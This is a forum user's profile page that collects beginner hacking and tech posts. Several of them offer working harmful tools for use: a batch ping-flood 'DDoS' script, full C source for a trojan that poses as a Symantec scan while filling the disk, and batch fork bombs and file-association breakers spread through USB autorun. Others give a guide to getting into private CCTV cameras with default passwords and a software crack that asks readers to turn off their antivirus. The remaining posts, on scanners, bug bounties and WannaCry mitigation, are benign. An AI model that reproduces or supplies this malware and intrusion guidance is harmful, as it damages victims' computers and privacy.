Chinmoy Pratim Borah

Editor
  • Content count

    19
  • Joined

  • Last visited

  • Days Won

    1

Chinmoy Pratim Borah last won the day on April 23 2017

Chinmoy Pratim Borah had the most liked content!

Community Reputation

2 Neutral

1 Follower

About Chinmoy Pratim Borah

  • Rank
    Member
  • Birthday
  1. Web site security is very important because the website contain relevant information about a company and now a days website defacement is very common even a script kiddies and a new born hackers can do this. The most common vulnerability like SQL-Injection and cross site scripting lead towards the defacement. So you want to secure your web application than find vulnerabilities on it before a hacker find it, try to use some relevant tools and find vulnerabilities and fix it. There are so many tools available for both Windows and Linux platform and commercial and open source tool. Below is the best web vulnerability scanner tool that we have discussed before. OWASP Zed Attack Proxy- ZAP OWASP or Open Web Application Security Project is a non profit organisation world wide that are focusing on improving the security of web application, for more about OWASP click here. The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It has an automatic scanning functionality and it has a set of tools that allow you to find vulnerability manually. Web Application Attack and Audit Framework (W3AF) W3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af is working for Become the best Open Source Web Application Exploitation Framework. It is available on Backtrack 5 too. Skipfish Web Vulnerability Scanner Tool Skipfish is an automatic web application security tool, that has been designed to find the vulnerabilities on a web application, find vulnerability on your website before than a hacker find and exploit it. It is also available on Backtrack 5. Nikto-Vulnerability Scanner Nikto is one of the best open source web vulnerability scanner tool that is available on the famous Linux distribution like Backtrack, Gnacktrack,Backbox and others. You can use it on other distribution and on windows too because it is only need perl script. Netsparker Web Application Security Scanner Netsparker is a commercial tool that has been designed to find the vulnerabilities on web application, the free version of netparker is also available so you can download it and can use for a quick penetration testing on a web application. Websecurify- Website Security Testing Tool Websecurify is a cross operating system tool that can be run on Windows, Linux and MAC. It is the best tool to find the common web vulnerabilities that can cause a great harm to the web application. This is just a small list of the best tools you can use Wapiti, Grendel scan and other tools to perform the job, you have any other tool in mind than do share it with us via comment box.
  2. Description : WannaSmile is a simple tool which will help you to protect from WannaCry Ransomware.WannaSmile is originally cretaed by Indrajeet Bhuyan and Hrishikesh Barman. This is a simple tool based on their program created by Chinmoy Pratim Borah. Instructions : Step 1 : Download WannaSmile GUI from this link : https://drive.google.com/open?id=0BwPVMEhB94GCYzNBNWJiYUZsdzQ Step 2 : Extract the file and open WannaSmile.exe as administrator Step 3 : Click On Start And see the picture below for the steps : You can download their version from (WannaSmile) : https://github.com/indrajeetb/WannaSmile
  3. WannaCry is a ransomware that is spreading fast and affecting many computer systems world wide including government systems, hospital systems etc. It uses a vulnerability in Microsoft Window's SMB protocol ( SMB stands for Server Message Block) which turned on by default. Once infected it asks the victim to pay 300$ bitcoins in order to remove the infection and decrypt all the encrypted files. Once infected, WannaCry also scans for other vulnerable computers connected to the same network, as well scans random hosts on the wider Internet, to spread quickly. The ransomware opens a unregistered domain and if it fail to open then the system is infected.Therefore security researcher Darien Huss registered the domain which stop or pause the ransomware. Soon Cyber criminals around the world DDOSed it to take it down so that the ransomware can continue affecting. How to protect yourself from WannaCry! Method 1 . Disable SMB Step 1 : Search for "Windows Features" and open it. Step 2 : Uncheck SMB. Step 3 : Click Ok and Restart your pc If you are a windows 7 or 8 user refer to this video : Method 2 : Use a tool "WannaSmile" WannaSmile is a simple tool created by friend Indrajeet Bhuyan and Hrishikesh Barman Instructions mentioned by them. Offline fix instructions. 1. Install the wannaSmile service by running the setup.exe from this release. (Download the wannasmile.zip file) 2. After Installing you need to start the service once and then it will do the rest automatically Online fix instructions. How To Run You directly run the .exe file and it will do the magic. ( Run as Administrator ). If you don't trust our .exe file then you yourself can compile and run it. DOWNLOAD WANNASMILE : https://github.com/indrajeetb/WannaSmile Also there is an update been released by Microsoft (MS17-010) Update it to it. WannaSmile-master.zip
  4. N today i am going to teach you how to Create/Make your own DDos Tool in notepad without programming skills! Open Notepad and paste the following code, @echo off mode 67,16 title DDOS Attack By Chinmoy Pratim Borah! color 0a cls echo. echo PrinceDDOS echo. set /p x=Server-Target: echo. ping %x% @ping.exe 127.0.0.1 -n 5 -w 1000 > nul goto Next :Next echo. echo. echo. set /p m=ip Host: echo. set /p n=Packet Size: echo. :DDOS color 0c echo Attacking Server %m% ping %m% -i %n% -t >nul goto DDOS and save it as anything.bat
  5. Well, Becoming a white hat hacker is easy. But finding vulnerabilities and reporting is little bit difficult. Ya, There are so many tools or software that scans and gives you the vulnerability of the particular website you are scanning for. But I always say to my friends (Begging in hacking) that never be depended on tools for hacking, like Havij, Hacker Box etc, Do everything manually! Doing manually will make you more tough!! I myself use some tools, in those rare time, when i have no time to do it manually.. Now a days when i see my friends reporting bugs and getting rewards, bounty, acknowledgements etc etc. Then i too like report bug and be in hall of fame.. Before knowing about BUG BOUNTY, let’s see the types in which the Vulnerability Disclosure is done. We generally have two ways of disclosing vulnerabilities: Full Disclosure Responsible Disclosure Full Disclosure is when a person goes onto his blog or any other form of public media and writes about the vulnerability that he discovered in the wild most of the times without informing the company where he found the vulnerability. This would allow various other hackers around the world to exploit this vulnerability. This would sometimes lead to problems because the company where you found the bug has got every right to take legal actions against you for letting out the information. Responsible Disclosure Responsible Disclosure is where the person who finds a vulnerability in a website directly tells it to the authorities of that website, so that they can rectify the issue as early as possible. And most of the companies reward them in return for reporting the vulnerability. And this is what is BUG BOUNTY. Well, bug bounty is indeed really a nice way to earn money. But more than money when your name comes up in their HALL OF FAME or the company’s RESPONSIBLE DISCLOSURE page, then that’s priceless. Coz that is what gives your resume some extra weightage and makes you stand out when compared to your peers. Books to read before Hunting Bugs: Well, these are the book I generally recommend anyone who wants to start off with web application pen-testing or particularly BUG BOUNTY. Web Application Hackers Handbook , Second Edition(Considered to be the Bible of Web Application Pen-testers) Hacking- The Art Of Exploitation OWASP Testing Guide v3.0 BUG Hunter’s TOOLKIT: These are the basic tools that most of the bug hunters generally use and suggest. Proxy: Burp Suite Web Scarab Fiddler Paros Proxy Mozilla Firefox is the best browser if you want to hunt bugs. And it is the best one coz of its awesome addons that ease our job. Mozilla Firefox ADDONS: Tamper Data Web Developer Extensions Live HTTP Headers Firebug XSS Me Sidebar Hackbar And many more... Other Useful Tools: IRONWASP XENOTIX Optional Tools: Camtasia Sreen Recorder and Snipping Tools (Useful for creating Proof Of Concepts). List Of BUG BOUNTY Programs: Well here is the link that provides you a BIG list of Bug Bounty Programs and Responsible Disclosure Pages. http://www.ehackingnews.com/2012/12/list-of-bug-bounty-program-for.html Other ways to earn BOUNTY: Recently I came across this new startup called BugCrowd that manage organized Bug Bounty for various companies. Just register yourself to start off with hunting bugs and earn money. http://bugcrowd.com/?kid=NG66 It’s a nice initiative indeed where in it’s a win-win situation for everyone. The company gets its site tested from best of the best hackers across the globe and indeed the hackers get paid for finding bugs and reporting it to them. Anyways, I hope the above article gives enough info to start off with Bug Hunting. Anyways I wish ALL THE BEST to all the beginners who want to start off with Bug Hunting. Always Remember: “If you’re good at Something, then never do it for FREE…!!!” Happy Hunting…;-D
  6. Well, Becoming a white hat hacker is easy. But finding vulnerabilities and reporting is little bit difficult. Ya, There are so many tools or software that scans and gives you the vulnerability of the particular website you are scanning for. But I always say to my friends (Begging in hacking) that never be depended on tools for hacking, like Havij, Hacker Box etc, Do everything manually! Doing manually will make you more tough!! I myself use some tools, in those rare time, when i have no time to do it manually.. Now a days when i see my friends reporting bugs and getting rewards, bounty, acknowledgements etc etc. Then i too like report bug and be in hall of fame.. Before knowing about BUG BOUNTY, let’s see the types in which the Vulnerability Disclosure is done. We generally have two ways of disclosing vulnerabilities: Full Disclosure Responsible Disclosure Full Disclosure is when a person goes onto his blog or any other form of public media and writes about the vulnerability that he discovered in the wild most of the times without informing the company where he found the vulnerability. This would allow various other hackers around the world to exploit this vulnerability. This would sometimes lead to problems because the company where you found the bug has got every right to take legal actions against you for letting out the information. Responsible Disclosure Responsible Disclosure is where the person who finds a vulnerability in a website directly tells it to the authorities of that website, so that they can rectify the issue as early as possible. And most of the companies reward them in return for reporting the vulnerability. And this is what is BUG BOUNTY. Well, bug bounty is indeed really a nice way to earn money. But more than money when your name comes up in their HALL OF FAME or the company’s RESPONSIBLE DISCLOSURE page, then that’s priceless. Coz that is what gives your resume some extra weightage and makes you stand out when compared to your peers. Books to read before Hunting Bugs: Well, these are the book I generally recommend anyone who wants to start off with web application pen-testing or particularly BUG BOUNTY. Web Application Hackers Handbook , Second Edition(Considered to be the Bible of Web Application Pen-testers) Hacking- The Art Of Exploitation OWASP Testing Guide v3.0 BUG Hunter’s TOOLKIT: These are the basic tools that most of the bug hunters generally use and suggest. Proxy: Burp Suite Web Scarab Fiddler Paros Proxy Mozilla Firefox is the best browser if you want to hunt bugs. And it is the best one coz of its awesome addons that ease our job. Mozilla Firefox ADDONS: Tamper Data Web Developer Extensions Live HTTP Headers Firebug XSS Me Sidebar Hackbar And many more... Other Useful Tools: IRONWASP XENOTIX Optional Tools: Camtasia Sreen Recorder and Snipping Tools (Useful for creating Proof Of Concepts). List Of BUG BOUNTY Programs: Well here is the link that provides you a BIG list of Bug Bounty Programs and Responsible Disclosure Pages. http://www.ehackingnews.com/2012/12/list-of-bug-bounty-program-for.html Other ways to earn BOUNTY: Recently I came across this new startup called BugCrowd that manage organized Bug Bounty for various companies. Just register yourself to start off with hunting bugs and earn money. http://bugcrowd.com/?kid=NG66 It’s a nice initiative indeed where in it’s a win-win situation for everyone. The company gets its site tested from best of the best hackers across the globe and indeed the hackers get paid for finding bugs and reporting it to them. Anyways, I hope the above article gives enough info to start off with Bug Hunting. Anyways I wish ALL THE BEST to all the beginners who want to start off with Bug Hunting. Always Remember: “If you’re good at Something, then never do it for FREE…!!!” Happy Hunting…;-D
  7. Clickjacking (User Interface redress attack, UI redress attack,UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. Now the question comes how to test for clickjacking,, This type of vulnerability often allows attacker’s site to induce user's actions on the target site even if anti-CSRF tokens are being used. So it's important, like for the CSRF attack, to individuate web pages of the target site that it take input from the user. First of all, we have to find the vulnerability in the website. For this we will be using a easy HTML code i.e IFRAME code! Many of you may also know about it! For testing we will be using this code. Where in the place of the target site, there will be your targeted site and save the file as .html <html> <head> <title>Clickjack test page</title> </head> <body> <p>Website is vulnerable to clickjacking!</p> <iframe src="http://www.target.site" width="500" height="500"></iframe> </body> </html> see the pic below for little info : You can also find clickjacking vulnerabilities for websites offering HOFS. That's all, thanks for reading.. will post more..
  8. In today’s scenario you will notice that CCTV cameras are used at many places like malls,offices and many more for many purposes.You must have seen the Public CCTV Cameras using the Google dorks but here today I will tell about hacking into private CCTV cams. Procedure For Hacking CCTV Cameras Step 1 : Downloading Angry IP Scanner Angry IP scanner that is generally used by network administrators for port scanning and detecting for the suspicious activity.It is available on all the major OS. Step 2 : Knowing your IP address range It is very important to know your public IP for accomplishing our target.CCTV cameras are connected to our broadband internet connection.If you are using a broadband connection then you can know your public IP by just going to Google or Bing and typing in the search box “My IP” .It will show your public IP. Here 103.26.218.207 is my public IP .So the IP range will be 103.26.218.1 to 103.26.218.255 Step 3 : Configuring Angry IP scanner Now you have to open Angry IP Scanner. Go to Tools > Preferences > Ports | include ports 80,8080,23 in Port choice tab It will filter 23,80 and 8080 port. Now we need to add the web detect option.Web detect is used when we want to know small details about the devices that are connected to the internet.For example any router name or the CCTV camera name or the model number. You can add web detect using the following procedure : Tools > Fetchers > add (<<) web detect click on the OK tab and you are done. Step 4 : Starting IP scanning Now fire up Angry IP scanner and enter the IP range.You now have to click on start for scanning. After few seconds when the scanning has finished then it will show information in web detect tab.Now you have to manually detect the CCTV camera.There are few parameters by which you can recognize your CCTV camera. DVRDVS-Webs – CCTV camera Webs – CCTV camera Hikvision-Webs — CCTV camera iBall-Baton — CCTV camera uc-httpd 1.0.0 — CCTV camera Now if any of the above configuration matches your list then you just have to note the IP address of the detected CCTV camera and Go in the address bar of the browser and paste it. Step 5 : Hacking into the CCTV Cameras Configuration Most of the CCTV cams and router has the default password in it so they can easily be hacked. For example you can give the below passwords a try – Username : admin | password : admin Username : admin | password : (blank password) Username : admin | password : 12345 Username : admin | password : 9999 You can explore more list by doing some R & D .For watching the live videos you must have some plugins and you will get the details inside the configuration page.
  9. Hey there, Chinmoy here and in this tutorial I am going to tell you how you can easily recover your lost data from your hard drive, USB stick etc very easily. Data loss can occur at any moment due to hard disk corrupt or by chance you deleted something important by mistake. For this we will be using a software called "EaseUS Data Recovery Wizard". This is a premium software but I will be giving you the crack too. DOWNLOAD CRACK AND HOW TO INSTALL THEM? 1. Download the trial version of EaseUS Data Recovery Wizard from below and install it. EaseUS Data recovery wizard + crack.rar 2. Download the crack from below and extract it. ( Before extracting disable your antivirus because it will say it is virus but trust its not ) 3. Disconnect your internet connection. 4. Open "Windows Firewall" To open Windows Firewall simply open Control Panel then click on System and Security and Click on Firewall. 5. After opening "Windows Firewall" click on "Advanced settings" and click on "outbound rules" 6. Then click on "new rule" 7. Click on program then click next then click on browse navigate to the directory where you have install the software and click on "DRW.exe" in my case its on " %ProgramFiles%\EaseUS\EaseUS Data Recovery Wizard\DRW.exe " 8. Then Click Next then click block connection again click next then give a project a name then click finish. 9. Now extract crack archive, then copy and paste crack file "Config.dat" in Easeus DR installation directory (C:/Programe files/Easeus/Easeus Data recovery).Now launch Easeus DR and and click on Activate button, then open the Keygen and generate a license code and use this Code in EaseUs DR. You will get a Machine code after inserting license code in Easeus DR, copy this machine code and paste it in keygen,then generate Activation code and use it for activation. Block DRWUI.exe (from EaseUs DR installation directory), in your firewall to prevent your license from getting blacklisted. Done. Enjoy! How to Use Data Recovery Wizard to Recover Lost Data? EaseUS Data Recovery Wizard Free, secure and effective data recovery tool, provides you with the best data recovery experience. How does EaseUS Data Recovery Wizard work? Just need simple steps, you can get all your data back. Step 1: Launch the Program and Start Scanning First of all, please download the program and install it on your computer (DO NOT install it on the disk where you lost your data, otherwise those lost files and data will be overwritten.). Select a Location to Start Finding Data Please select a location to start finding data, like Desktop, Windows Libraries, Existing partitions, Lost partitions (This option is suitable for the situation of a data loss caused by deleting a partition, losing a partition or re-partition. Our program will read the partition table and list all the deleted partition info under it.) Step 2: Scan Your Computer or Device In the upper part of the program is the process bar displaying the status of the recovery. after the process bar is the estimated remaining time. Technically the first scan will be very quick. Our program will first list all the files that are simply deleted or cleaned from the recycle bin. After the quick scan, our program will perform a new sector by sector scan automatically, which will take longer than the first scan. Please be patient and do not interrupt it in the middle of the process if not necessary. Step 3: Preview and Recover the Files The scan result interface is divided into 3 parts. At the left is the Directory Tree list. The window in the middle displays all the files and folders under the folder selected in the left window with more info (date, type, size and so on). The window at the right side displays a thumbnail and info for the file selected in the middle window. It provides a Preview option to preview some specific file types in the program. After the preview or search, you can select the targeted files and press Recover button to recover and save them on your computer or storage device (Please DO NOT save the files into the drive or device where you lost the data). Moreover, you can export the scan results by clicking Export Scan Status, and you can Import the scan results to perform another recovery without scanning again at any time by clicking Import Scan Status. DOWNLOAD BELOW EaseUS Data recovery wizard + crack.rar
  10. Enfolio is the premium one page HTML template with a clean and modern design. The template is the perfect choice for small business or/and people who do not want a website with a lot of pages. The template contains the following sections – main\home, portfolio, styles, about and contact us. You can easily add your own sections or delete existing. Also you can change default portfolio layout, switch menu from fixed to free and make some other changes. To help you do that I made very detailed documentation with a lot of images. Features Nivo slider with custom-built thumbnails panel (the panel can display up to 8 images) Unlimited color choices (pick up your own color that suits you best) Two different switchable portfolio layouts (thumbnails and full-width) Quicksand plugin (portfolio items can be organized into groups and displayed separately) PrettyPhoto plugin (supports images, iframe, inline content, mov, swf and Vimeo\Youtube flash videos) Google Maps plugin Ready to use AddThis social bookmarking add-on AJAX Contact form with validation Javascript fallback Extensive documentation Valid XHTML 1.0 Strict markup Last update Enfolio 1.3 – June 28, 2015 Sources and Credits Josefin Sans Std Light font by Google and Santiago Orozco MgOpen Modata font by MAGENTA Ltd. jQuery Nivo Slider by Gilbert Pellegrom jQuery ScrollTo & LocalScroll by Ariel Flesler jQuery Quicksand by Jacek Galanciak jQuery Validation by Jorn Zaefferer jQuery Animate CSS Rotation and Scaling by Zachary Johnson jQuery Prettyphoto by Stephane Caron jQuery gMap Cedric Kastner Screenshots How to use the template? After downloading the whole template, open the folder use a text editor to edit and replace images, logos with your images and logos! NOTE : If you find any problems while editing the template feel free to leave a comment. DOWNLOAD HERE! enfolio.rar
  11. Hey there, Chinmoy here, Today in this post I will be telling you how you can create a simple virus in C that will eat up space! Now just follow the steps mentioned below! 1. Open any text editor I will be using notepad for this. 2. Copy the following code below and save it with the extension " .c " without quotes ( " ) for example : space.c #include<stdio.h> #include<conio.h> #include<dos.h> #include<stdlib.h> FILE *a,*t,*b; int r,status,vir_count; double i; char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice; void eatspace(void); void findroot(void); void showstatus(void); void draw(void); void accept(void); void main() { draw(); accept(); textcolor(WHITE); draw(); gotoxy(12,8); cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT..."); sleep(3); gotoxy(12,8); delline(); cputs("PRESS ANY KEY TO START THE SYSTEM SCAN..."); getch(); gotoxy(12,8); delline(); findroot(); } void accept() { textcolor(LIGHTRED); gotoxy(1,8); cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT."); if((choice=getch())!=13) exit(0); } void draw() { clrscr(); textcolor(WHITE); gotoxy(12,2); cputs("********************************************************"); gotoxy(12,6); cputs("********************************************************"); gotoxy(12,3); cputs("*\n\b*\n\b*\n\b"); gotoxy(67,3); cputs("*\n\b*\n\b*\n\b"); gotoxy(14,4); cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)"); } void findroot() { t=fopen("C:\\windows\\explorer.exe","rb"); if(t!=NULL) { fclose(t); textcolor(WHITE); a=fopen("C:\\windows\\system32\\spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("C:\\windows\\system32\\spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("D:\\windows\\explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("D:\\windows\\system32\\spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("D:\\windows\\system32\\spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("E:\\windows\\explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("E:\\windows\\system32\\spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("E:\\windows\\system32\\spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("F:\\windows\\explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("F:\\windows\\system32\\spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("F:\\windows\\system32\\spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } if(t==NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM."); getch(); exit(1); } exit(1); } void eatspace() { textcolor(LIGHTRED); gotoxy(12,16); cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n"); textcolor(WHITE); gotoxy(12,18); while(1) { for(r=1;r<4;r++) { for(i=1;i<900000;i++) { status=fputs(ch,b); if(status==EOF) { textcolor(WHITE); vir_count=random(120); draw(); gotoxy(12,8); cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count); gotoxy(12,10); cprintf("PRESS ANY KEY TO CLOSE..."); getch(); break; } } cputs("."); if(status==EOF) break; } if(status==EOF) break; } exit(0); } void showstatus() { gotoxy(12,8); cputs("SCANNING THE SYSTEM FOR THREATS"); gotoxy(12,10); cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS"); gotoxy(12,13); cputs("SCAN IN PROGRESS. PLEASE WAIT..."); } 3. Now compile space.c to space.exe if you don't know how to compile hit up GOOGLE 4. Now time come To test the Trojan, just run the Space.exe file on your computer as administrator mode . It will generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up the hard disk space. How To Fix The Damage And Free Up The Space? If you run this Trojan on your own PC then you see your full c drive fill with junks file ,now learn here how to fix the damage and free up the space.To remove the damage and free up the space, just type the following in the “run” dialog box and hit okay . Now you need to search for the file “spceshot.dll“. Just delete it and you’re done.
  12. Want to make your friend or anyone feel irritated ? Well today I am going to share you some codes that are not harmful but will make your friend mind hot so lets get started! So first of all What is batch? A batch file is a kind of script file in DOS, OS/2 and Microsoft Windows. It consists of a series of commands to be executed by the command-line interpreter, stored in a plain text file. Copy any code you want and paste it in Notepad and save it as .bat 1. Application Bomb - It will continuously open some applications in the victim's computer. @echo off :cpb start notepad start mspaint start explorer start cmd start calc goto cpb 2. Automatic Folder Maker - It will keep making folder until the victim stopped the batch file. @echo off :cpb md %random% goto cpb 3. Hang Windows - This code will hang victim's computer. @echo off %0|%0 4. Extension Changer - This will change the extension of files in victim's computer to stop functioning @echo off assoc .txt=cpb assoc .exe=cpb assoc .jpeg=cpb assoc .png=cpb assoc .mpeg=cpb Now how to spread this viruses through pendrive. Simply open notepad and paste any of this code and save it with ".bat" extension without quotes ( " ) for example cpb.bat Now open notepad and paste the following code [autorun] open=cpb.bat and save the file as "autorun.inf" without quotes ( " ) Here, cpb.bat will be the coded file. Now copy and paste cpb.bat and autorun.inf in the pendrive. More codes in the next post
  13. There were many rumors that the new versions smartphone of Nokia's i.e Nokia 6, Nokia 5, Nokia 3 and Nokia 3310 will be launched in the month of April or May in India. Before going further let us see the features of Nokia 6, Nokia 5, Nokia 3 and Nokia 3310 respectively. NOKIA 6 Price : Rs 15,000 (Approx) IN THE BOX Your Nokia 6 Charger Charging/data cable Headset Quick guide SIM door key DESIGN Colors Arte Black (limited edition), Matte Black, Tempered Blue, Silver, Copper Size 154 x 75.8 x 7.85 mm (8.4 with camera bump) NETWORK AND CONNECTIVITY Network speed LTE Cat. 4, 150Mbps DL/50Mbps UL Networks GSM: 850/900/1800/1900; WCDMA: Band 1, 2, 5, 8; LTE: Band 1, 3, 5, 7, 8, 20, 28, 38, 40 PERFORMANCE Operating system Android™ 7.1.1 Nougat RAM Arte Black, 4 GB; all other colors, 3 GB CPU Qualcomm® Snapdragon™ 430 mobile platform STORAGE Internal memory Arte Black, 64 GB2; all other colors, 32 GB2 MicroSD card slot Support for up to 128 GB Services Google Drive AUDIO Connector 3.5 mm headphone jack Speakers Dual speakers Amplifier Smart amplifier (TFA9891) with Dolby Atmos® DISPLAY Size and type 5.5” IPS LCD Resolution Full-HD (1920 x 1080, 16:9) Material Sculpted Corning® Gorilla® Glass Pixel density 403 ppi Brightness 450 nits, laminated Features Sunlight readability CAMERA Primary camera 16MP PDAF, 1.0um, f/2, dual tone flash Front-facing camera 8MP AF, 1.12um, f/2, FOV 84 degrees CONNECTIVITY AND SENSORS Connectivity Micro USB (USB 2.0), USB OTG, Wi-Fi, Bluetooth 4.1 Sensors Accelerometer (G-sensor), ambient light sensor, e-compass, Hall sensor, fingerprint sensor, gyroscope, proximity sensor, NFC (sharing) BATTERY LIFE Battery type Integrated 3000 mAh battery4 Nokia 5 IN THE BOX Your Nokia 5 Charger Charging/data cable Headset Quick guide SIM door key DESIGN Colors Tempered Blue, Silver, Matte Black, Copper Size 149.7 x 72.5 x 8.05 mm (8.55 with camera bump) NETWORK AND CONNECTIVITY Network speed LTE Cat. 4, 150Mbps DL/50Mbps UL Networks GSM: 850/900/1800/1900; WCDMA: Band 1, 2, 5, 8; LTE: Band 1, 3, 5, 7, 8, 20, 28, 38, 40 PERFORMANCE Operating system Android™ 7.1.1 Nougat RAM 2 GB CPU Qualcomm® Snapdragon™ 430 mobile platform STORAGE Internal memory 16 GB2 MicroSD card slot Support for up to 128 GB Services Google Drive AUDIO Connector 3.5 mm headphone jack Speakers Single speaker Amplifier Smart amplifier (TFA9891) DISPLAY Size and type 5.2” IPS LCD Resolution HD (1280 x 720, 16:9) Material 2.5D sculpted Corning® Gorilla® Glass Brightness 500 nits, laminated Features Sunlight visibility improvement, polarizer CAMERA Primary camera 13MP PDAF, 1.12um, f/2, dual tone flash Front-facing camera 8MP AF, 1.12um, f/2, FOV 84 degrees CONNECTIVITY AND SENSORS Connectivity Micro USB (USB 2.0), USB OTG, Wi-Fi, Bluetooth 4.1 Sensors Accelerometer (G-sensor), ambient light sensor, e-compass, fingerprint sensor, Hall sensor, gyroscope, proximity sensor, NFC (sharing) BATTERY LIFE Battery type Integrated 3000 mAh battery3 Price : Rs 13,000 (Approx) Nokia 3 IN THE BOX Your Nokia 3 Charger Charging/data cable Headset Quick guide SIM door key DESIGN Colors Tempered Blue, Silver, Matte Black, Copper Size 143.4 x 71.4 x 8.48 mm (8.68mm is camera bump) NETWORK AND CONNECTIVITY Network speed LTE Cat. 4, 150Mbps DL/50Mbps UL Networks GSM: 850/900/1800/1900, WCDMA: Band 1, 2, 5, 8, LTE: Band 1, 3, 5, 7, 8, 20, 28, 38, 40 PERFORMANCE Operating system Android™ 7.0 Nougat CPU MTK 6737, Quad-core 1.3Ghz RAM 2 GB STORAGE Internal memory 16 GB2 MicroSD slot Support for up to 128 GB AUDIO Connector 3.5 mm headphone jack Speakers Single speaker DISPLAY Size and type 5.0” IPS LCD Resolution HD (1280 x 720, 16:9) Material 2.5D sculpted Corning® Gorilla® Glass Brightness 450 nits, laminated Features Polarizer CAMERA Primary camera 8MP AF, 1.12um, f/2, LED flash Front-facing camera 8MP AF, 1.12um, f/2, FOV 84 degrees, display flash CONNECTIVITY AND SENSORS Connectivity Micro USB (USB 2.0), USB OTG, Bluetooth, Wi-Fi Sensors Accelerometer (G-sensor), ambient light sensor, e-compass, gyroscope, proximity sensor, NFC for sharing BATTERY Battery type Integrated 2630 mAh battery3 Price : Rs 9,799 Nokia 3310 - The icon is back IN THE BOX Your Nokia 3310 Nokia MicroUSB charger WH-108 headset* Quick guide *Varies by market, please check availability DESIGN Colors Warm Red (Glossy), Dark Blue (Matte), Yellow (Glossy), Grey (Matte) Size 115.6 x 51 x 12.8 mm NETWORK AND CONNECTIVITY Network speed 2G Networks GSM 900/1800 MHz PERFORMANCE Operating system Nokia Series 30+ STORAGE Internal memory 16 MB4 MicroSD card slot Support for up to 32 GB, memory card sold separately AUDIO Connector 3.5 mm AV connector Apps FM radio, MP3 player DISPLAY Size and type 2.4” QVGA CAMERA Primary camera 2MP Flash LED flash CONNECTIVITY Connectivity Micro USB (USB 2.0), Bluetooth 3.0 with SLAM BATTERY LIFE Battery type Removable 1200 mAh battery5 Max. talk time Up to 22.1 hours Max. standby time Up to 25.3 days Max. MP3 playback time Up to 51 hours Max. FM radio playback time Up to 39 hours Price : Rs 3,899 All this phone will be launched in June 2017 in India
  14. Dear readers today I am going to tell you How to Remove a Virus Using Command Prompt Virus is a computer program that can copy itself and infect your computer. These viruses can spread via USB/flash drive or from one computer to other computer by few written codes. There are many antivirus software available to remove viruses from computer. But there are some viruses or suspicious files which can’t be removed by any antivirus software. Some suspicious files such as autorun.inf initiate all the viruses in pc. These files must be removed for safe operation of your pc, because they may lead to data loss, software damages etc. Such viruses and files can be removed by using cmd. In this article we will discuss how to remove a virus using command prompt. Following steps can be used to remove a virus using command prompt from your computer. Go to start menu and type “cmd” in the search box or Start>all programs>accessories>command prompt. Open the infected drive such as write , g: to go to G drive. Now type dir/w/a . It will show all the files of the drive including hidden files. Locate AUTORUN.INF or any Virus and other suspicious files in the directory. there was no virus in my drive so only autorun.inf is been highlighted. Type command attrib -r –a –s –h to remove attributes of corresponding file. Type del autorun.inf to delete autorun.inf file. Now type del virus name.exe t delete it, eg : del newfolder.exe . (You can also delete viruses by using following steps: When you find an Autorun.inf file or any other unusual .exe file just rename it. Syntax for rename is (rename filename.extension new name , for example: (rename autorun.inf virus) to rename autorun.inf file. Here I have renamed it by “virus”. Now you can access the defected drive without affecting the virus. To delete the renamed file go to the defected drive and select the file you renamed. Now delete the harmful renamed files.) You have deleted that virus successfully but sometimes virus resides in the Recycler folder.To locate this folder: Type cd recycler command. Again type dir/w/a to locate all file of the folder. Identify malicious files and delete them using above commands. Follow the above steps carefully and i think this information is enough to remove a virus using command prompt easily. Important: Make sure that no other processes being running while performing these actions. Best of luck.
